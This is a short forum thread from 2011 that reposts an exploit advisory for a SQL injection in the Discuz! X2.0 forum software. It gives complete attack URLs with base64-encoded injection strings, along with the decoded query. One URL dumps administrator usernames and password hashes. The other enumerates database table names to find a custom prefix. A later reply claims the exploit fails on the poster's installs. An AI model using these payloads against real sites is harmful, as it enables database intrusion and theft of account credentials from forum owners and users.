x2 sql injection!

Safaali · Post time: 2011-10-16 08:04

http://sebug.net/exploit/20671/

vot · Post time: 2011-10-16 12:07

The vulnerability report:

Discuz! X2.0 SQL Injection vulnerability EXP
SSV-ID: 20671
SSV-Appdir: Discuz!
Published: 2011-06-28
Exploit:
[sebug.net]
The following procedures (methods) may contain something offensive，they are only for security researches and teaching , at your own risk!
Discuz! X2.0 Direct display the administrator account password (in the case the default prefix used)

http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D

base64 decoding:
1' and 1=2 union all select 1,group_concat(username,0x7C3274747C,password) from pre_common_member where username like ‘admin|x|y

If not, the default prefix
violence prefix EXP

http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D
// sebug.net [2011-06-29]

vot · Post time: 2011-10-16 12:08

I have tested this exploit at my Dzx 1.5 and 2.0 version.
This exploit DOES NOT WORK!
You can test this by yourself.

Account		Remember me	Forgot password?
Password			Register